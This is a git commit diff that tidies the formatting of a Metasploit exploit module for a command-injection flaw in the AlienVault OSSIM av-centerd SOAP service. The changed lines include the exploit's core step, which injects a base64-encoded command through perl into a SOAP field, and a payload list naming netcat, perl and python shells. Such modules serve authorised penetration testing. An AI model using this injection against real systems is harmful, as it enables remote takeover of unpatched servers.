Land jvazquez-r7/metasploit#15, @kernelsmith's module cleanup

2014-06-17 23:40:46 -05:00 · 2014-06-17 23:40:46 -05:00 · 8cae8d545e
parent f7b892e55b 45ea59050c
commit 8cae8d545e
1 changed files with 16 additions and 9 deletions
--- a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb
+++ b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb
@ -16,11 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote
    super(update_info(info,
      'Name'          => 'AlienVault OSSIM av-centerd Command Injection',
      'Description'   => %q{
-        This module exploits a code execution flaw in AlienVault 4.6.1 and prior.
-        The vulnerability exists in the av-centerd SOAP web service, where the
-        update_system_info_debian_package method uses perl backticks in a insecure
-        way, allowing command injection. This module has been tested successfully
-        on AlienVault 4.6.0.
+        This module exploits a code execution flaw in AlienVault 4.6.1 and
+        prior.  The vulnerability exists in the av-centerd SOAP web service,
+        where the update_system_info_debian_package method uses perl backticks
+        in an insecure way, allowing command injection. This module has been
+        tested successfully on AlienVault 4.6.0.
      },
      'Author'        =>
        [
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
-          #'BadChars'    => "[;`$<>|]", # Don't apply because of the perl stub applied
+          #'BadChars'   => "[;`$<>|]", # Don't apply bcuz of the perl stub applied
          'Compat'      => {
            'RequiredCmd' => 'perl netcat-e openssl python gawk'
          }
@ -66,7 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote
    version = ""
    res = send_soap_request("get_dpkg")

-    if res && res.code == 200 && res.headers['SOAPServer'] && res.headers['SOAPServer'] =~ /SOAP::Lite/ && res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
+    if res &&
+       res.code == 200 &&
+       res.headers['SOAPServer'] &&
+       res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
+       res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
+
      version = $1
    end

@ -107,8 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote

    if method == "update_system_info_debian_package"
      args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
-      perl_payload = "system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
-      args[4].text = "#{rand_text_alpha(4 + rand(4))} && perl -MMIME::Base64 -e '#{perl_payload}'"
+      perl_payload  = "system(decode_base64"
+      perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
+      args[4].text  = "#{rand_text_alpha(4 + rand(4))}"
+      args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"
    end

    xml.to_s